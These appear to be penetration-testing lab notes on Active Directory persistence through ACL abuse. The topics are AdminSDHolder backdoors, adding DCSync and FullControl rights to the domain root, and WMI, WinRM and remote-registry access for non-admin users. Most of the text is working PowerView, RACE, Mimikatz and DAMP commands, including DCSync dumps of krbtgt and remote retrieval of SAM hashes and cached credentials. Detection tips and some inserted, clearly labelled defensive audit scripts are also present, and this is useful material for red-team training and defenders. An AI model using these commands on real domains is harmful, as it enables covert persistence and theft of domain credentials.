
ACLs

AdminSDHolder
Admin Security Descriptor Holder

AdminSDHolder is a container object in Active Directory that stores the security descriptor
template for protected groups and their members. These groups have elevated privileges
and require extra security measures. The AdminSDHolder object's ACL is automatically
applied to all protected groups and their members, ensuring consistent permissions and
preventing unauthorized access.

AdminSDHolder resides in the System container of a domain and is used to control the permissions (via its ACL) of certain built-in privileged groups, the so-called Protected Groups, and their members.
The Security Descriptor Propagator (SDProp) runs every 60 minutes by default, compares the ACL of each protected group and member with the ACL of AdminSDHolder, and overwrites any difference on the object's ACL.

In short, AdminSDHolder protects the ACLs of privileged principals from unwanted changes.

→ With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, it can be used as a backdoor/persistence mechanism by adding a user with Full Control (or other interesting permissions) to the ACL of the AdminSDHolder object.
→ Within 60 minutes (when SDProp runs), the user will be granted FullControl in the ACL of groups like Domain Admins without actually being a member of them.

ACLs and ACEs in AdminSDHolder (screenshot)

ACLs and ACEs in any protected group, e.g. the Administrators group (screenshot)

ACLs and ACEs of the Backup Operators group (screenshot)

Abuse
• Add FullControl permissions for a user to the AdminSDHolder using PowerView as Domain Admin
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName <username> -Rights All -Verbose

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

→ Using the ActiveDirectory module and the RACE toolkit (https://github.com/samratashok/RACE)
Set-DCPermissions -Method AdminSDHolder -SAMAccountName student1 -Right GenericAll -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Verbose

• Add ResetPassword permissions for a user to the AdminSDHolder using PowerView as Domain Admin
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName <username> -Rights ResetPassword -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights ResetPassword -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

• Add WriteMembers permissions for a user to the AdminSDHolder using PowerView as Domain Admin
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName <username> -Rights WriteMembers -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights WriteMembers -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

• Add FullControl permissions for a user to the AdminSDHolder using the ActiveDirectory module and Set-ADACL as Domain Admin
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Principal <username> -Verbose

• Run SDProp manually using Invoke-SDPropagator.ps1
Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose # For pre-Server 2008 machines

• Check the Domain Admins permissions using PowerView as a normal user
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ? {$_.IdentityReference -match '<username>'}
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student1"}

• Check the Domain Admins permissions using the ActiveDirectory module as a normal user
(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ? {$_.IdentityReference -match '<username>'}

• Abuse FullControl by adding a user to the Domain Admins group using PowerView_dev
Add-DomainGroupMember -Identity 'Domain Admins' -Members <username> -Verbose

• Abuse FullControl by adding a user to the Domain Admins group using the ActiveDirectory module
Add-ADGroupMember -Identity 'Domain Admins' -Members <username>

• Abuse ResetPassword by resetting a user's password using PowerView_dev
Set-DomainUserPassword -Identity <username> -AccountPassword (ConvertTo-SecureString "<new-password>" -AsPlainText -Force) -Verbose

• Abuse ResetPassword by resetting a user's password using the ActiveDirectory module
Set-ADAccountPassword -Identity <username> -NewPassword (ConvertTo-SecureString "<new-password>" -AsPlainText -Force) -Verbose

Rights Abuse (Persistence using ACLs)
With Domain Admin privileges, the ACL for the domain root can be modified to provide
useful rights like FullControl or the ability to run DCSync.

• Add FullControl permissions for a user to the ACL of the domain root using PowerView as Domain Admin
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName <username> -Rights All -Verbose
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

• Add FullControl permissions for a user to the ACL of the domain root using the ActiveDirectory module and Set-ADACL as Domain Admin
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal <username> -Verbose
Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Right GenericAll -Verbose

• Add DCSync rights for a user to the ACL of the domain root using PowerView as Domain Admin
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName <username> -Rights DCSync -Verbose
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
# 3 permissions: Replicating Directory Changes, Replicating Directory Changes All, Replicating Directory Changes In Filtered Set

• Add DCSync rights for a user to the ACL of the domain root using the ActiveDirectory module and Set-ADACL as Domain Admin
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal <username> -GUIDRight DCSync -Verbose
# 3 permissions: Replicating Directory Changes, Replicating Directory Changes All, Replicating Directory Changes In Filtered Set
Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -GUIDRight DCSync -Verbose

• Check if we have the replication rights required to run DCSync
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "<username>") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}
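The defender-side version of the check above, as an added example that is not part of the original notes: it enumerates every principal on the domain root that holds one of the three replication extended rights (matched by their well-known rightsGuid values), an all-extended-rights ACE, or GenericAll, and marks anything outside a constructed baseline. It assumes the ActiveDirectory module; the baseline regex is an assumption to adjust for your forest.

```powershell
# Added example (not part of the original notes): enumerate which principals hold the
# replication extended rights (the three DCSync rights) or GenericAll on the domain root,
# and mark anything outside a constructed baseline. Assumes the ActiveDirectory module.
Import-Module ActiveDirectory

# rightsGuid values of the three replication extended rights (well-known schema constants).
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$AllGuid       = '00000000-0000-0000-0000-000000000000'   # empty ObjectType = every extended right
$ExtendedRight = 0x100                                    # ActiveDirectoryRights.ExtendedRight
$GenericAll    = 0xF01FF                                  # ActiveDirectoryRights.GenericAll

function Get-DcSyncRightHolders {
    param(
        [string]$DomainDn = (Get-ADDomain).DistinguishedName,
        # Constructed baseline: regex of trustees expected to replicate. Add your directory
        # synchronisation service account (e.g. Entra Connect) if you run one.
        [string]$ExpectedPattern = '^(NT AUTHORITY\\(SYSTEM|ENTERPRISE DOMAIN CONTROLLERS)|BUILTIN\\Administrators|.+\\(Domain Controllers|Enterprise Read-only Domain Controllers|Domain Admins|Enterprise Admins))$'
    )
    foreach ($ace in (Get-Acl -Path "AD:\$DomainDn").Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $mask  = [int]$ace.ActiveDirectoryRights
        $guid  = $ace.ObjectType.ToString()
        $right = $null
        if (($mask -band $GenericAll) -eq $GenericAll) { $right = 'GenericAll (implies all replication rights)' }
        elseif (($mask -band $ExtendedRight) -ne 0) {
            if ($ReplicationRights.ContainsKey($guid)) { $right = $ReplicationRights[$guid] }
            elseif ($guid -eq $AllGuid) { $right = 'All extended rights' }
        }
        if (-not $right) { continue }
        [pscustomobject]@{
            Identity  = $ace.IdentityReference.Value
            Right     = $right
            Inherited = $ace.IsInherited
            Expected  = $ace.IdentityReference.Value -match $ExpectedPattern
        }
    }
}

# Principals that can run DCSync but are not in the baseline are the ones to investigate.
Get-DcSyncRightHolders | Where-Object { -not $_.Expected } | Format-Table -AutoSize
```

A single Get-Changes ACE without Get-Changes-All is not enough for a full secrets pull, so the Right column tells you whether a finding is complete or partial.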

• Execute DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<Domain>\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<Domain>\Administrator"' # Can be used for any user
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Conclusion:
AdminSDHolder is a stealthy persistence method: by leveraging a key security component, an attacker keeps the ability to modify the most privileged groups in Active Directory. Even if the permissions on a protected group or user are changed back, SDProp will reset the security permissions to match those of the AdminSDHolder object.

Detection:
Monitor the ACLs configured on the AdminSDHolder object. These should be kept at the default; it is not usually necessary to add other groups to the AdminSDHolder ACL.
Monitor users and groups with AdminCount = 1 to identify accounts whose ACLs have been set by SDProp.
Find all users and groups with security ACLs set by SDProp using the PowerShell AD cmdlets:
Import-Module ActiveDirectory
Get-ADObject -LDAPFilter "(&(admincount=1)(|(objectcategory=person)(objectcategory=group)))" -Properties MemberOf,Created,Modified,AdminCount
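The two detection points above, worked into one script as an added example that is not part of the original notes: it diffs the AdminSDHolder DACL against a constructed baseline of default trustees and lists users that still carry AdminCount=1 but are no longer in any protected group. It assumes the ActiveDirectory module; the baseline is an assumption to extend with groups you have deliberately approved.

```powershell
# Added example (not part of the original notes): audit the AdminSDHolder DACL against a
# baseline of expected trustees and report principals that still carry AdminCount=1 but are
# no longer members of any protected group. Assumes the ActiveDirectory module.
Import-Module ActiveDirectory

function Get-AdminSDHolderAudit {
    param(
        # Constructed baseline of trustees normally present on AdminSDHolder; extend it with
        # groups you have deliberately approved (e.g. Exchange groups) before relying on it.
        [string[]]$ExpectedTrustees = @(
            'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF', 'NT AUTHORITY\Authenticated Users',
            'BUILTIN\Administrators', 'BUILTIN\Pre-Windows 2000 Compatible Access',
            'BUILTIN\Terminal Server License Servers', 'BUILTIN\Windows Authorization Access Group',
            'Everyone'
        )
    )
    $domain = Get-ADDomain
    $root   = Get-ADDomain -Identity (Get-ADForest).RootDomain
    $ExpectedTrustees += "$($domain.NetBIOSName)\Domain Admins", "$($domain.NetBIOSName)\Cert Publishers",
                         "$($root.NetBIOSName)\Enterprise Admins"

    # 1. ACEs on AdminSDHolder whose trustee is not in the baseline: SDProp will copy each of
    #    these onto every protected group and member within the hour.
    $holderDn = "CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
    $unexpected = (Get-Acl -Path "AD:\$holderDn").Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       $ExpectedTrustees -notcontains $_.IdentityReference.Value } |
        Select-Object IdentityReference, ActiveDirectoryRights, ObjectType, IsInherited

    # 2. Orphaned AdminCount=1 users: SDProp sets the flag but never clears it, so a user removed
    #    from a protected group keeps the hardened ACL and is still worth reviewing.
    $protectedGroups  = Get-ADGroup -LDAPFilter '(adminCount=1)'
    $protectedMembers = $protectedGroups |
        ForEach-Object { Get-ADGroupMember -Identity $_ -Recursive -ErrorAction SilentlyContinue } |
        Select-Object -ExpandProperty distinguishedName -Unique
    $orphans = Get-ADUser -LDAPFilter '(adminCount=1)' -Properties whenChanged |
        Where-Object { $protectedMembers -notcontains $_.DistinguishedName } |
        Select-Object SamAccountName, DistinguishedName, whenChanged

    [pscustomobject]@{
        AdminSDHolder      = $holderDn
        UnexpectedAces     = @($unexpected)
        OrphanedAdminCount = @($orphans)
    }
}

$audit = Get-AdminSDHolderAudit
$audit.UnexpectedAces     | Format-Table -AutoSize
$audit.OrphanedAdminCount | Format-Table -AutoSize
```

Run it on a schedule shorter than the SDProp interval and alert on any new row in UnexpectedAces, since that is the window before the ACE is propagated.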

Resources
https://adsecurity.org/?p=1906
https://blog.harmj0y.net/redteaming/abusing-active-directory-permissions-with-powerview/
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence
https://github.com/jwardsmith/Active-Directory-Exploitation#rights-abuse-persistence-using-acls

Security Descriptors
Security Descriptor Definition Language (SDDL) defines the string format used to describe a security descriptor. SDDL uses ACE strings for the DACL and the SACL, each with six semicolon-separated fields:
ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
Example: A;CI;CCDCLCSWRPWPRCWD;;;SID

A security descriptor stores the permissions that principals have over an object.
A small change to the security descriptor of an object can grant very interesting privileges over that object without the principal being a member of any privileged group.
https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/security-descriptors
What are DACLs, SACLs and ACEs?
https://docs.netapp.com/us-en/ontap/smb-admin/security-descriptors-apply-file-folder-security-concept.html
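A parser for the ACE string format above, as an added example that is not part of the original notes: it splits each parenthesised ACE into its six fields, expands the two-letter rights tokens and flags the rights that let a trustee rewrite the ACL or the object itself. The sample SDDL is constructed (the note's example ACE with BA as trustee plus a read-only ACE); the rights and alias tables are the documented SDDL abbreviations.

```powershell
# Added example (not part of the original notes): split the ACE strings of an SDDL string
# into their six fields, expand the two-letter rights tokens and flag rights that let a
# trustee rewrite the ACL or the object itself. Pure string handling, so it works unchanged
# on the output of "sc.exe sdshow <service>" or any other SDDL you collect.

$SddlRights = @{
    GA = 'GenericAll';   GR = 'GenericRead';   GW = 'GenericWrite';  GX = 'GenericExecute'
    RC = 'ReadControl';  SD = 'Delete';        WD = 'WriteDac';      WO = 'WriteOwner'
    CC = 'CreateChild';  DC = 'DeleteChild';   LC = 'ListChildren';  SW = 'SelfWrite'
    RP = 'ReadProperty'; WP = 'WriteProperty'; DT = 'DeleteTree';    LO = 'ListObject'
    CR = 'ControlAccess'
}
$AceTypes = @{ A = 'Allow'; D = 'Deny'; OA = 'ObjectAllow'; OD = 'ObjectDeny'; AU = 'Audit'; OU = 'ObjectAudit' }
# Common trustee aliases. Note that WD means Everyone here but WriteDac in the rights field.
$SidAliases = @{ BA = 'Builtin\Administrators'; SY = 'Local System'; AU = 'Authenticated Users'
                 WD = 'Everyone'; DA = 'Domain Admins'; DU = 'Domain Users'; BU = 'Builtin\Users' }
# Rights that allow an ACL/ownership takeover or rewriting the object's own attributes.
$HighRisk = 'GenericAll', 'GenericWrite', 'WriteDac', 'WriteOwner', 'WriteProperty', 'ControlAccess'

function ConvertFrom-SddlAce {
    param([Parameter(Mandatory)][string]$Sddl)
    # Each ACE is parenthesised: (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
    foreach ($m in [regex]::Matches($Sddl, '\(([^)]*)\)')) {
        $f = $m.Groups[1].Value.Split(';')
        if ($f.Count -lt 6) { continue }                    # not an ACE string, skip it
        if ($f[2] -match '^0x') { $rights = @("Mask $($f[2])") }   # rights may also be a raw hex mask
        else {
            $rights = [regex]::Matches($f[2], '..') | ForEach-Object {
                if ($SddlRights.ContainsKey($_.Value)) { $SddlRights[$_.Value] } else { "?$($_.Value)" }
            }
        }
        $trustee = if ($SidAliases.ContainsKey($f[5])) { "$($f[5]) ($($SidAliases[$f[5]]))" } else { $f[5] }
        [pscustomobject]@{
            AceType     = if ($AceTypes.ContainsKey($f[0])) { $AceTypes[$f[0]] } else { $f[0] }
            AceFlags    = $f[1]
            Rights      = @($rights) -join ','
            ObjectGuid  = $f[3]
            InheritGuid = $f[4]
            Trustee     = $trustee
            HighRisk    = @($rights | Where-Object { $HighRisk -contains $_ }).Count -gt 0
        }
    }
}

# Constructed sample: the ACE from the note above with BA as trustee, plus a read-only ACE.
ConvertFrom-SddlAce -Sddl 'D:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;;RPLCRC;;;AU)' | Format-Table -AutoSize
```

The same function takes the SecurityDescriptorSddl property returned by Get-PSSessionConfiguration, so WinRM endpoint permissions can be reviewed the same way as service descriptors.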

Abuse
→ Show the SDDL of a service
sc.exe sdshow <service>

• Give a user the ability to execute WMI queries on a target machine (e.g. a Domain Controller) even without administrative privileges, using the GUI as Domain Admin. This consists of two parts: the user must have permission to connect to the DCOM endpoint, and permission to connect to the WMI namespace.

DCOM endpoint: Start Menu -> Component Services -> Computers -> My Computer -> Properties -> COM Security tab -> Access Permissions -> Edit Limits -> Add our user -> Allow everything
Namespace: Start Menu -> Computer Management -> Services and Applications -> WMI Control -> Properties -> Security tab -> Root -> Security -> Add our user -> Allow everything -> Advanced -> Select our user -> Edit -> Applies to 'This namespace and subnamespaces'

Access to execute WMI remotely

• Give a user the ability to execute WMI queries on a target machine (e.g. a Domain Controller) even without administrative privileges, using PowerShell commands (modifying ACLs to allow non-admin users access to securable objects) as Domain Admin, using the RACE.ps1 module.

→ On the local machine for student1
Set-RemoteWMI -SamAccountName student1 -Verbose

→ On a remote machine for student1 without explicit credentials
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Namespace 'root\cimv2' -Verbose

→ On a remote machine with explicit credentials. Only root\cimv2 and nested namespaces
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -Namespace 'root\cimv2' -Verbose

→ On a remote machine, remove the permissions
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -Namespace 'root\cimv2' -Remove -Verbose

→ Check if you can execute WMI queries
Get-WmiObject -Class win32_operatingsystem -ComputerName <Domain Controller>
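The namespace half of the WMI permission change above can be audited from the other side; this is an added example, not part of the original notes or of RACE. It reads the namespace DACL through the __SystemSecurity class and reports which trustees hold Remote Enable (WBEM_REMOTE_ACCESS), the bit that makes remote queries possible. It assumes CIM reachability of the target and a caller permitted to read the namespace security descriptor; the baseline trustee list and the dcorp-dc host are assumptions.

```powershell
# Added example (not part of the original notes): read a WMI namespace DACL through the
# __SystemSecurity class and report which trustees hold Remote Enable (WBEM_REMOTE_ACCESS),
# which is the bit the procedure above grants to a non-admin user. Assumes WinRM/CIM
# reachability of the target and a caller allowed to read the namespace security descriptor.

# Namespace access-mask bits as defined in WbemCli.h.
$WbemRights = [ordered]@{
    EnableAccount = 0x1;     MethodExecute = 0x2;  FullWrite = 0x4;  PartialWrite = 0x8
    ProviderWrite = 0x10;    RemoteEnable  = 0x20; Subscribe = 0x40; Publish      = 0x80
    ReadControl   = 0x20000; WriteDac      = 0x40000
}

function Get-WmiNamespaceAccess {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [string]$Namespace    = 'root\cimv2',
        # Constructed baseline of trustees that should hold Remote Enable on a DC.
        [string[]]$ExpectedTrustees = @('BUILTIN\Administrators')
    )
    $session = New-CimSession -ComputerName $ComputerName
    try {
        $sd = (Invoke-CimMethod -CimSession $session -Namespace $Namespace `
                   -ClassName __SystemSecurity -MethodName GetSecurityDescriptor).Descriptor
        foreach ($ace in $sd.DACL) {
            $t    = $ace.Trustee
            $name = if ($t.Domain) { "$($t.Domain)\$($t.Name)" } else { $t.Name }
            $held = $WbemRights.Keys | Where-Object { ($ace.AccessMask -band $WbemRights[$_]) -ne 0 }
            [pscustomobject]@{
                Namespace     = $Namespace
                Trustee       = $name
                Sid           = $t.SIDString
                AceType       = if ($ace.AceType -eq 0) { 'Allow' } else { 'Deny' }
                Rights        = @($held) -join ','
                RemoteEnable  = ($ace.AccessMask -band $WbemRights.RemoteEnable) -ne 0
                SubNamespaces = ($ace.AceFlags -band 0x2) -ne 0    # CONTAINER_INHERIT_ACE
                Expected      = $ExpectedTrustees -contains $name
            }
        }
    }
    finally { Remove-CimSession -CimSession $session }
}

# Allow ACEs granting Remote Enable to anyone outside the baseline are the ones to review.
Get-WmiNamespaceAccess -ComputerName dcorp-dc |
    Where-Object { $_.AceType -eq 'Allow' -and $_.RemoteEnable -and -not $_.Expected } | Format-Table -AutoSize
```

The DCOM half of the procedure is stored as a binary security descriptor in HKLM\SOFTWARE\Microsoft\Ole\MachineAccessRestriction and needs a separate check.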

Access to WinRM
• Give a user the ability to use PowerShell Remoting to a target machine (e.g. a Domain Controller) even without administrative privileges, using PowerShell commands (modifying ACLs to allow non-admin users access to securable objects) as Domain Admin, using RACE.ps1 and PS Remoting.
### Note: this is not stable after the August 2020 patches

→ On the local machine for student1
Set-RemotePSRemoting -SamAccountName student1 -Verbose

→ On a remote machine for student1 without credentials
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose

→ On a remote machine, remove the permissions
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove

Remote access to hashes

• Modify a user's permissions on the Remote Registry service and on several registry keys of a target machine (e.g. a Domain Controller) so the user can read them even without administrative privileges, using PowerShell commands (modifying ACLs to allow non-admin users access to securable objects) as Domain Admin.

• Access the registry and dump hashes by creating a registry backdoor with DAMP, so that at any moment you can retrieve the machine account hash, the SAM and any cached AD credentials on that computer. This is why granting this permission to a regular user against a Domain Controller is so useful for persistence.

→ Using RACE or DAMP, with admin privileges on the remote machine, plant the backdoor that allows remote retrieval of the system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose

→ As student1, retrieve the machine account hash. Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose

→ Retrieve the local account hashes. Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose

→ Retrieve the domain cached credentials. Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose

Resources
https://github.com/jwardsmith/Active-Directory-Exploitation#rights-abuse-persistence-using-acls